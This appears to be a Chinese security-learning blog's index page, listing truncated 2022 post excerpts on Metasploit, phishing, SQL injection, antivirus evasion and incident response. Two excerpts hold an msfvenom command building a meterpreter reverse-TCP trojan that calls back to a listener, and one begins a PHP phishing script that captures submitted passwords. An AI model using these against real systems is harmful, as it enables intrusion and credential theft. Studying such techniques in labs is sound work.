Broken-year

认识手机木马以及移动安全android基于linux 开发语言java 应用广泛：什么地方都有java虚拟机但是： java->臃肿->java虚拟机->c语言->机器语言->操作系统苹果： oc/

2022-03-24 网络安全

认识系统后门meterpreter创建系统后门创建x64木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 -f exe >

2022-03-24 网络安全

网络安全后门 msf 渗透 windows

社会工程学认识网络钓鱼：使用网站克隆工具实在不行，用手写 PHPstudy 新建php文件： <?php $username = $_POST['TextBoxUserName']; $password = $_POST['Text

2022-03-24 网络安全

网络安全信息搜集社会工程学

系统防火墙原理及突破数据和嗅探：目标电脑上msf运行木马后 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 -f exe -o m

2022-03-23 网络安全

网络安全渗透 windows 防火墙

操作系统权限及信息采集系统权限windowssystemadministrator(others) linuxroot(others) 计算机组成相关权限CPU:OS（操作系统——可以在其身上安装其他软件的软件，需要配合硬件）ring0 权

2022-03-23 网络安全

MSF框架以及使用msfconsole //打开msf 在msf里可以使用别的工具，比如nmap nmap -sV [ip] //扫描一下 msf如果攻击对方需要条件： 1.要有漏洞 2.攻击载荷 ms17010use explo

2022-03-23 网络安全

msf 工具 kali 漏洞

其他web漏洞介绍靶场DVWA网上下载自己部署就好了 Brute Force暴力破解可以仔细观察密码输入错误和正确的页面返回大小是不一样的使用burp抓包，send to intruder，调整相应参数后进行攻击。 sinper模

2022-03-23 网络安全

网络安全 web 漏洞

SQL注入工具的使用网站的一些组合windows+iis（网站服务器）+asp/aspx(asp.net)+access/mssql【企业内部使用概率大】【打下来是普通用户权限】windows+apache+php+my

2022-03-23 网络安全

PHP文本连接数据库准备工作首先要打开mysql服务以及apache服务在网页中输入127.0.0.1/phpmyadmin进入mysql图形化管理界面新加一个名叫test的库，库里table1表，表里有id，usernam

2022-03-22 PHP

PHP 编程 mysql

漏洞扫描原理以及sql注入关于漏洞漏洞为什么会出现？ ——因为和用户有互动。因为需要调用后端的逻辑代码，甚至需要调用数据库或者操作系统命令最基本的sql sql注入靶场 sqli-labs 命令行操作数据库mysql.exe -u

2022-03-22 网络安全

网络安全漏洞 PHP sql注入

免杀技术以及木马处理如果需要深入了解需要学习：破解、二进制、逆向工程杀毒软件原理：扫描技术：扫描压缩包，对压缩包内容进行分析检查程序篡改防护：避免感染文件修复技术：对受损文件进行还原急救盘杀毒：利用空白的

2022-03-21 网络安全

黑客攻击应急响应应急响应web入侵：挂马，网页篡改（菠菜，黑帽seo），植入webshell，黑页，暗链等主机入侵：病毒木马，勒索病毒，远控后门，系统异常，RDP爆破，SSH爆破，主机漏洞，数据库入侵等网络攻击：DDOS/CC

2022-03-21 网络安全

网络安全应急响应